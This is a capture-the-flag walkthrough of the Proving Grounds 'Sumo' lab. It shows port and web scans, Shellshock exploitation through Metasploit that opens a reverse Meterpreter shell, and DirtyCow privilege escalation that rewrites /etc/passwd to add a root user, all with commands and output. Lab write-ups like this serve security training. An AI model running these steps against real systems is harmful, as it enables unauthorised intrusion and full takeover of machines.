people playing on stadium during daytime

Proving Grounds: Sumo Walkthrough

, ,

Machine Stats

Ubuntu Linux 12.04



I started by running my standard nmap scan..

└─$ nmap -A -T4 -p- 
Starting Nmap 7.92 ( ) at 2022-03-22 22:10 EDT
Nmap scan report for
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
|   2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_  256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds

Here we can see an open web server. I run a gobuster directory enumeration scan but don’t seem to return anything too interesting on the surface.

└─$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/index                (Status: 200) [Size: 177]
/server-status        (Status: 403) [Size: 295]

I like to scan all webservers with Nikto secondarily, so I gave this a shot. (extraneous information removed below, denoted with <..> markers)

└─$ nikto -h        
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2022-03-22 22:13:57 (GMT-4)
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (
+ OSVDB-112004: /cgi-bin/ Site appears vulnerable to the 'shellshock' vulnerability (
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2022-03-22 22:18:58 (GMT-4) (301 seconds)
+ 1 host(s) tested

User Account

Alright, well I am feeling lazy so I’m going to use Metasploit for this. I wanted the exploit with the best reliability, and chose this one, rated “excellent”:


msf6 > search shellshock

1   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)

msf6 > use 1

I wanted the exploit with the best reliability so I chose the following module, rated “excellent” and set the following options:

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost tun0
lhost => tun0
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/test.
TARGETURI => /cgi-bin/
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost
rhost =>

I crossed my fingers and ran the dang thing.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

[*] Started reverse TCP handler on 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (989032 bytes) to
[*] Meterpreter session 1 opened ( -> ) at 2022-03-22 22:23:39 -0400

meterpreter > getuid
Server username: www-data

I wanted to get some info about the system, bring over my script for enumerating weaknesses and exploits, and also grab the low privilege user flag.

meterpreter > sysinfo
Computer     :
OS           : Ubuntu 12.04 (Linux 3.2.0-23-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

meterpreter > upload /var/www/html/ /tmp
[*] uploading  : /var/www/html/ -> /tmp
[*] uploaded   : /var/www/html/ -> /tmp/

meterpreter > download ./local.txt
[*] Downloading: ./local.txt -> /home/me/local.txt
[*] Downloaded 33.00 B of 33.00 B (100.0%): ./local.txt -> /home/me/local.txt
[*] download   : ./local.txt -> /home/me/local.txt

└─$ cat local.txt              

Privilege Escalation & Root Flag

Checking out the linpeas output, I noticed immediately that the machine was vulnerable against the infamous dirtycow privilege escalation route. I was also kind of surprised to not find a working Metasploit module for this one. There was a litany of other potential vulnerabilities but I knew the name of this one already, so figured it was probably the way to go here.

╔══════════╣ Executing Linux Exploit Suggester

[+] [CVE-2016-5195] dirtycow 2

   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL:
   Comments: For RHEL/CentOS see exact vulnerable versions here:

I confirmed the victim machine was running GCC to compile the exploit C code and then backgrounded my session to drop back to meterpreter.

meterpreter > upload /usr/share/exploitdb/exploits/linux/local/40839.c /tmp
[*] uploading  : /usr/share/exploitdb/exploits/linux/local/40839.c -> /tmp
[*] uploaded   : /usr/share/exploitdb/exploits/linux/local/40839.c -> /tmp/40839.c

I then went back to my system shell via the session I just backgrounded and began running the exploit as described in the Exploit DB page.

gcc -pthread 40839.c -o dirty -lcrypt


I set the password to “test” and waited for the exploit to continue.

Please enter the new password: test

/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:

mmap: 7f01a3ef0000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'test'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:

mmap: 7f01a3ef0000
madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'test'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

Browsing the exploit code, I can see that the username being created here is firefart. I opened a new terminal and SSH’ed to the victim machine as this user, with the password I just set. (test)

└─$ ssh firefart@                  
firefart@'s password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

firefart@ubuntu:~# id
uid=0(firefart) gid=0(root) groups=0(root)

firefart@ubuntu:~# cat /root/proof.txt

I submitted this flag and it was accepted.

Scroll to Top